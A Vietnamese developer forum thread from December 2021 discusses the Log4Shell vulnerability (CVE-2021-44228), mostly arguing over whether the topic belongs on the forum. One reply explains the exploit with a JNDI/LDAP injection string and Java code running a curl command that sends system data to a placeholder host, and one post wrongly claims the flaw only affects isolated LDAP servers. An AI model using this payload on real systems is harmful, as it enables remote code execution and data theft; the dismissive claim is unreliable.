Lỗ hổng Log4j tác động thế nào đến Việt Nam?

just1minute · December 14, 2021, 6:16am

Trong khi ‘The Internet Is on Fire’:

Log4j may be the worst vulnerability yet, says Department of Homeland Security | AppleInsider — https://appleinsider.com/articles/21/12/13/log4j-may-be-the-worst-vulnerability-yet-says-department-of-homeland-security

CISA warns ‘most serious’ Log4j vulnerability likely to affect hundreds of millions of devices — www.cyberscoopDOTcom/log4j-cisa-easterly-most-serious/

Hackers start pushing malware in worldwide Log4Shell attacks — www.bleepingcomputerDOTcom/news/security/hackers-start-pushing-malware-in-worldwide-log4shell-attacks/

và phản ứng của Việt Nam:

NCSC: Lổ hỗng bảo mật trong Apache Log4j đang được khai thác rộng rãi - ICTNews — https://ictnews.vietnamnet.vn/bao-mat/ncsc-lo-hong-bao-mat-trong-apache-log4j-dang-duoc-khai-thac-rong-rai-400208.html

còn daynhauhoc vẫn say sưa học tập cơ bản… Một số “tinh hoa” mải tranh luận về Docker!

kisuluoibieng · December 14, 2021, 5:25am

Mình chưa hiểu đoạn này lắm, có vẻ như không liên quan lắm với tiêu đề

library · December 14, 2021, 6:34am

Hi @just1minute

Tớ có một vài câu hỏi dành cho cậu.

What is your point?
Vấn đề của cậu là gì? Bọn tớ có thể giúp gì được cho cậu?
Cậu có góp ý gì tới daynhauhoc không?
Nếu có, bọn tớ sẵn lòng muốn nghe lời góp ý của cậu.
Cậu đã có kết luận gì về lỗ hổng log4j và ảnh hưởng của nó ở Việt Nam chưa?
Nếu có, tớ rất muốn nghe ý kiến cá nhân của cậu.

Để cho cậu đỡ bỡ ngỡ, tớ cũng muốn đề cập rằng, diễn đàn mình hướng tới đối tượng với phạm vi rộng, với các trình độ khác nhau.
Tuy nhiên, cậu có thể thấy, các bạn newbie và ngồi trên ghế nhà trường chiếm đa số. Vậy nên, có lẽ phần lớn topic được thảo luận ở đây là các topic “cơ bản”.
Nếu cậu hứng thú với bất cứ topic advance nào, cậu có thể tạo 1 topic và thảo luận về nó, hoặc đóng góp các bài viết với chủ đề advance hơn. Đó sẽ là resource vô cùng có giá trị cho cộng đồng.

Vu_Nguyen5 · December 14, 2021, 9:04am

Chào anh, theo kinh nghiệm của anh thì lỗ hổng log4j có thể khiến kẻ xấu đánh cắp thông tin cũng như tiền bạc từ những người sử dụng dịch vụ của những nhà cung cấp liên quan hay không. Theo như em đọc tin tức thì có thể người dùng IOS sẽ bị ảnh hưởng nhiều hơn người dùng android, nhận định này liệu có đúng không anh?

drgnz · December 14, 2021, 2:41pm

DNH xài Discourse (xài ruby) chạy trên nginx có cloudflare chống lưng thì lo chi cho mệt?

Còn việc mitigation planning thì share sao được. Việc như vậy có thể lợi dụng tình hình công ty đang có vấn đề nhằm tấn công thì lại chết ư?

Ngoài kể trên, việc không bàn cái này thì DNH chưa có đủ số lượng các bạn thành viên quan tâm vấn đêf này. Nên bàn cũng rất khó và cũng không mang hiệu quả nhiều cho diễn đàn

Ntech_Developers · December 14, 2021, 11:37am

Hôm qua team security công ty mình thông báo tất cả các chi nhánh về vụ này. Cơ mà chủ thớt làm phát tiêu đề cụt lủn không giải thích gì thêm mà còn nói mỉa
Chán thực sự!

dont_have_a_name · December 14, 2021, 11:51am

Bản chất của daynhauhoc là… dạy nhau học, những vấn đề liên quan có thảo luận cũng được, không có cũng không sao. Bạn muốn thể hiện sự “quan tâm” thì cứ lướt Twitter, có rất nhiều security experts cho bạn bàn và flex độ quan tâm của bạn, nước nào cũng có, trình nào cũng chơi. Bạn đang quảng cáo sai đối tượng rồi

hungaya · December 14, 2021, 12:43pm

Lỗi liên quan Log4J nằm ở đây
https://nvd.nist.gov/vuln/detail/CVE-2021-44228

Đọc cái abstract summary thôi là đủ rồi. Nó chỉ ảnh hưởng server chạy LDAP (~~OLAP~~) thôi. Server phân tích dữ liệu lúc nào cũng chạy độc lập với với server phục vụ end user, nên không có một tác động nào đến Internet cả.

doanguyen · December 14, 2021, 12:39pm

Cái này chắc bác hơi đơn giản vấn đề, theo mình hiểu các POC cho 0day này tạo backchannel sử dụng directory protocol (LDAP) được hỗ trợ bởi jndi, hầu như các enterprise nào cũng sử dụng protocol này. Ngoài ra thì mấy ông blackhat thì không thiếu trò để mần mò khai thác.

tntxtnt · December 14, 2021, 1:12pm

Cloudfront của Amazon có xài Java bị ảnh hưởng nha

drgnz · December 14, 2021, 2:39pm

biết chứ nhưng ngta patch rồi mới dám gáy

phamvandung · December 14, 2021, 3:10pm

Người ta quan tâm drama liên quan đến vấn đề phần mềm mã nguồn mở, donate support các thứ chứ quan tâm gì đến lỗ hổng bảo mật

Le_Duy_Tung · December 14, 2021, 4:38pm

cấu cuối của bạn thực sự rất ngớ ngẩn và mang tính cà khịa?

nguyenhuuca · December 15, 2021, 4:42am

Cái này liên quan đên công việc, thứ 6 công bố, t7 client gọi, người ta fix, deploy trong ngày. rảnh như chú thì mới lên đây lập topic cà khịa thôi.

nguyenhuuca · December 15, 2021, 4:45am

Có thêm một lỗi nữa rồi
https://nvd.nist.gov/vuln/detail/CVE-2021-45046 :v

library · December 15, 2021, 9:13am

Hi @Vu_Nguyen5

Để tớ trả lời lần lượt các câu hỏi của cậu nha

Chào anh, theo kinh nghiệm của anh thì lỗ hổng log4j có thể khiến kẻ xấu đánh cắp thông tin cũng như tiền bạc từ những người sử dụng dịch vụ của những nhà cung cấp liên quan hay không

Để biết được lỗ hổng này có thể gây hại gì, cậu cần hiểu chút về nó
Về cơ bản, lỗi này là lỗi rất nghiêm trọng. Nếu như cậu đã đọc bug report, cậu có thể thấy lỗi này do log4j có sử dụng JNDILookup plugin (được add vào từ năm 2013).
Về cơ bản, log4j sẽ phân giải placeholder có cú pháp ${jndi:<string>} và thực hiện hành động liên quan. Vậy nên, nếu một hệ thống nào dùng log4j, và log ra các thông tin từ request, chỉ cần gửi request có cú pháp như trên là cậu có thể trigger JNDI lookup rồi.
Mọi chuyện nghiêm trọng hơn, khi cậu có thể sử dụng JNDI với LDAP. Về cơ bản, combo này cho phép cậu deserial một object/đoạn code Java từ remote LDAP server trên máy có sử dụng log4j.
Tức là, nếu cậu dựng được một LDAP server của riêng cậu, rồi gửi một request tới 1 server sử dụng log4j có cấu trúc như thế này:

${jndi:ldap://<host>:<port>/<path>}

Nếu server kia có dùng log4j để in ra thông tin:

// userInput chứa xâu jndi ở trên
log.info("Kaboom! {}", userInput);

Xâu JNDI sẽ được phân giải, một request sẽ được gọi tới LDAP server được chuẩn bị sẵn của cậu, để download object mà cậu chuẩn bị.

Nếu cậu chuẩn bị đoạn code thế này ở LDAP server:

String payload = "uname -a | curl -d @- http://<host>";
String[] cmds = {"/bin/bash", "-c", payload};
java.lang.Runtime.getRuntime().exec(cmds);

Cậu sẽ thực thi được một đoạn script cậu đã chuẩn bị sẵn ở http://<host>, như bất cứ tay mơ nào có thể thực hiện

Về cơ bản, cậu có thể làm rất nhiều thứ với việc inject code java của riêng cậu trên server có log4j, vậy nên, có khả năng cao cậu sẽ học được rất nhiều thông tin quý giá về thiết kế trong của hệ thống, và từ đó, cậu có thể lấy được rất nhiều thứ.
2 điều cậu liệt kê là một trong số đó

Theo như em đọc tin tức thì có thể người dùng IOS sẽ bị ảnh hưởng nhiều hơn người dùng android, nhận định này liệu có đúng không anh?

Tớ không rõ bên Android họ thiết kế ra sao, nhưng tớ có từng thấy 1 người post lên twitter việc anh ấy đã tấn công được iOS server quản lý profile các thiết bị, bằng việc thay đổi tên của điện thoại
Cơ mà, như @nguyenhuuca đã đề cập ở trên, lỗi này sẽ được patch rất nhanh, nên tớ không nghĩ iOS user có bất cứ vấn đề gì đâu

Hope it helps!

See also:

https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j